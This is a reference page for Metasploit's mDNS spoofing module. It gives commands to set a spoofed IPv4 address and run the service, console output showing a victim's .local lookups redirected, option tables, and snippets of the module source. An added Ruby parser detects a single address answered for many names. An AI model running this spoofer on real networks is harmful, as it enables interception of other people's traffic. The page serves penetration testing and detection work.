mDNS Spoofer - Metasploit
This page contains detailed information about how to use the auxiliary/spoof/mdns/mdns_response Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: mDNS Spoofer
Module: auxiliary/spoof/mdns/mdns_response
Source code: modules/auxiliary/spoof/mdns/mdns_response.rb
Disclosure date: -
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will listen for mDNS multicast requests on 5353/udp for A and AAAA record queries, and respond with a spoofed IP address (assuming the request matches our regex).
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/spoof/mdns/mdns_response
msf auxiliary(mdns_response) > show targets
... a list of targets ...
msf auxiliary(mdns_response) > set TARGET target-id
msf auxiliary(mdns_response) > show options
... show and set options ...
msf auxiliary(mdns_response) > exploit
Knowledge Base
Vulnerable Application
To use mdns_response, be on a network with devices/applications that can make mDNS multicast requests on 5353/udp for A and AAAA record queries.
Verification Steps
use auxiliary/spoof/mdns/mdns_response
set INTERFACE network_iface
set SPOOFIP4 10.x.x.x
run
Options
The SPOOFIP4 option
IPv4 address with which to spoof A-record queries
set SPOOFIP4 [IPv4 address]
The SPOOFIP6 option
IPv6 address with which to spoof AAAA-record queries
set SPOOFIP6 [IPv6 address]
The REGEX option
Regex applied to the mDNS to determine if spoofed reply is sent
set REGEX [regex]
The TTL option
Time To Live for the spoofed response (in seconds)
set TTL [number of seconds]
Scenarios
msf > use auxiliary/spoof/mdns/mdns_response
msf auxiliary(mdns_response) > set SPOOFIP4 10.x.x.y
SPOOFIP4 => 10.x.x.y
msf auxiliary(mdns_response) > set INTERFACE en3
INTERFACE => en3
msf auxiliary(mdns_response) > run
[*] Auxiliary module execution completed
msf auxiliary(mdns_response) >
[*] mDNS spoofer started. Listening for mDNS requests with REGEX "(?-mix:.*)" ...
On Victim Machine
ping something.local
(IP address should resolve to spoofed address)
[+] 10.x.x.z mDNS - something.local. matches regex, responding with 10.x.x.y
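In the scenario above, one address is returned for whatever .local name is asked, and a monitor on 5353/udp can look for exactly that. The Ruby below is an added example, not code from the module or from this page: it parses mDNS response payloads and reports IPv4 addresses that were answered for several distinct names. The function names, the min_names threshold and the sample names and addresses are assumptions constructed for illustration, and only A records are handled.

```ruby
# Read a DNS name at off (RFC 1035 compression aware); returns [name, next offset].
def read_name(buf, off)
  labels, resume = [], nil
  128.times do # bounded walk: a compression-pointer loop cannot hang the parser
    len = buf.getbyte(off) or raise ArgumentError, 'truncated name'
    if len >= 0xC0
      low = buf.getbyte(off + 1) or raise ArgumentError, 'truncated pointer'
      # follow the pointer, remembering where the record continues
      resume, off = resume || off + 2, ((len & 0x3F) << 8) | low
    elsif len.zero?
      return [labels.join('.').downcase, resume || off + 1]
    else
      labels << buf.byteslice(off + 1, len)
      off += len + 1
    end
  end
  raise ArgumentError, 'pointer loop'
end

# [name, ipv4] per A record in the answer section; class is masked for the mDNS cache-flush bit.
def a_answers(buf)
  _id, flags, qd, an = buf.unpack('n4')
  return [] unless an && (flags & 0x8000) != 0 # QR bit clear: a query, not a response
  off = 12
  qd.times { off = read_name(buf, off)[1] + 4 }
  Array.new(an) do
    name, off = read_name(buf, off)
    type, klass, _ttl, rdlen = buf.byteslice(off, 10).unpack('nnNn')
    raise ArgumentError, 'truncated record' unless rdlen
    rdata, off = buf.byteslice(off + 10, rdlen), off + 10 + rdlen
    [name, rdata.bytes.join('.')] if type == 1 && (klass & 0x7FFF) == 1 && rdata&.bytesize == 4
  end.compact
end

# Map each answered address to the distinct names it was returned for; keep the busy ones.
def shared_answer_addresses(payloads, min_names: 3)
  seen = Hash.new { |h, k| h[k] = [] }
  payloads.each do |payload|
    a_answers(payload).each { |name, addr| seen[addr] |= [name] }
  rescue ArgumentError # malformed packet: skip it and keep processing
  end
  seen.select { |_addr, names| names.size >= min_names }
end

# Constructed sample payloads (made-up names, documentation addresses), one A record each.
SAMPLE = [%w[printer.local 192.0.2.10], %w[printer.local 192.0.2.66],
          %w[nas.local 192.0.2.66], %w[tv.local 192.0.2.66]].map do |name, ip|
  qname = name.split('.').map { |l| l.bytesize.chr + l }.join + "\0"
  [0, 0x8400, 0, 1, 0, 0, qname, 1, 0x8001, 120, 4, *ip.split('.').map(&:to_i)].pack('n6a*nnNnC4')
end
```

shared_answer_addresses(SAMPLE) returns the one address that was handed out for three different names; on a live network the threshold needs tuning against hosts that legitimately publish several names.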
Msfconsole Usage
Here is how the spoof/mdns/mdns_response auxiliary module looks in the msfconsole:
msf6 > use auxiliary/spoof/mdns/mdns_response
msf6 auxiliary(spoof/mdns/mdns_response) > show info
Name: mDNS Spoofer
Module: auxiliary/spoof/mdns/mdns_response
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Joe Testa <jtesta[at]positronsecurity.com>
James Lee <egypt[at]metasploit.com>
Robin Francois <rof[at]navixia.com>
Available actions:
Name     Description
----     -----------
Service  Run mDNS spoofing service
Check supported:
No
Basic options:
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
INTERFACE                   no        The name of the interface
REGEX      .*               yes       Regex applied to the mDNS to determine if spoofed reply is sent
SPOOFIP4                    yes       IPv4 address with which to spoof A-record queries
SPOOFIP6                    no        IPv6 address with which to spoof AAAA-record queries
TIMEOUT    500              yes       The number of seconds to wait for new data
TTL        120              no        Time To Live for the spoofed response (in seconds)
Description:
This module will listen for mDNS multicast requests on 5353/udp for
A and AAAA record queries, and respond with a spoofed IP address
(assuming the request matches our regex).
References:
https://tools.ietf.org/html/rfc6762
Module Options
This is a complete list of options available in the spoof/mdns/mdns_response auxiliary module:
msf6 auxiliary(spoof/mdns/mdns_response) > show options
Module options (auxiliary/spoof/mdns/mdns_response):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
INTERFACE                   no        The name of the interface
REGEX      .*               yes       Regex applied to the mDNS to determine if spoofed reply is sent
SPOOFIP4                    yes       IPv4 address with which to spoof A-record queries
SPOOFIP6                    no        IPv6 address with which to spoof AAAA-record queries
TIMEOUT    500              yes       The number of seconds to wait for new data
TTL        120              no        Time To Live for the spoofed response (in seconds)
Auxiliary action:
Name     Description
----     -----------
Service  Run mDNS spoofing service
Advanced Options
Here is a complete list of advanced options supported by the spoof/mdns/mdns_response auxiliary module:
msf6 auxiliary(spoof/mdns/mdns_response) > show advanced
Module advanced options (auxiliary/spoof/mdns/mdns_response):
Name                Current Setting  Required  Description
----                ---------------  --------  -----------
GATEWAY_PROBE_HOST  8.8.8.8          yes       Send a TTL=1 random UDP datagram to this host to discover the default gateway's MAC
GATEWAY_PROBE_PORT                   no        The port on GATEWAY_PROBE_HOST to send a random UDP probe to (random if 0 or unset)
SECRET              1297303073       yes       A 32-bit cookie for probe requests.
VERBOSE             false            no        Enable detailed status messages
WORKSPACE                            no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the spoof/mdns/mdns_response module can do:
msf6 auxiliary(spoof/mdns/mdns_response) > show actions
Auxiliary actions:
Name     Description
----     -----------
Service  Run mDNS spoofing service
Evasion Options
Here is the full list of possible evasion options supported by the spoof/mdns/mdns_response auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(spoof/mdns/mdns_response) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
The code snippets below, taken from the module source code, show where each message is printed and can often help identify the root cause of the problem.
<VALUE> mDNS - <NAME> did not match REGEX "<REGEX>"
Here is a relevant code snippet related to the "<VALUE> mDNS - <NAME> did not match REGEX "<REGEX>"" error message:
qm = true
dns_pkt.question.each do |question|
  name = question.qName
  if datastore['REGEX'] != '.*'
    unless name =~ /#{datastore['REGEX']}/i
      vprint_status("#{rhost.to_s.ljust 16} mDNS - #{name} did not match REGEX \"#{datastore['REGEX']}\"")
      next
    end
  end

  # Check if the query is the "QU" type, which implies that we need to send a unicast response, instead of a multicast response.
IP version is not 4 or 6. Failed to parse?
Here is a relevant code snippet related to the "IP version is not 4 or 6. Failed to parse?" error message:
      :ip_proto => 0x11, # UDP
      :body => udp
    )
  else
    # Should never get here
    print_error("IP version is not 4 or 6. Failed to parse?")
    return
  end
  ip_pkt.recalc

  capture_sendto(ip_pkt, rhost.to_s, true)
Related Pull Requests
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7877 Merged Pull Request: Added MDNS query spoofing service.
References
See Also
Check also the following modules related to this module:
- auxiliary/admin/netbios/netbios_spoof
- auxiliary/server/dns/spoofhelper
- auxiliary/server/netbios_spoof_nat
- auxiliary/spoof/arp/arp_poisoning
- auxiliary/spoof/cisco/cdp
- auxiliary/spoof/cisco/dtp
- auxiliary/spoof/dns/bailiwicked_domain
- auxiliary/spoof/dns/bailiwicked_host
- auxiliary/spoof/dns/compare_results
- auxiliary/spoof/dns/native_spoofer
- auxiliary/spoof/llmnr/llmnr_response
- auxiliary/spoof/nbns/nbns_response
- auxiliary/spoof/replay/pcap_replay
- auxiliary/voip/sip_invite_spoof
- exploit/windows/fileformat/winrar_name_spoofing
- post/linux/manage/dns_spoofing
- post/osx/gather/password_prompt_spoof
- exploit/windows/imap/mdaemon_cram_md5
- exploit/windows/imap/mdaemon_fetch
- post/windows/gather/credentials/mdaemon_cred_collector
- auxiliary/dos/mdns/avahi_portzero
- auxiliary/scanner/mdns/query
- exploit/osx/mdns/upnp_location
- auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
- exploit/windows/browser/getgodm_http_response_bof
- exploit/windows/misc/apple_quicktime_rtsp_response
- exploit/windows/misc/talkative_response
- exploit/multi/misc/weblogic_deserialize_asyncresponseservice
Authors
- Joe Testa <jtesta[at]positronsecurity.com>
- James Lee <egypt[at]metasploit.com>
- Robin Francois <rof[at]navixia.com>
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.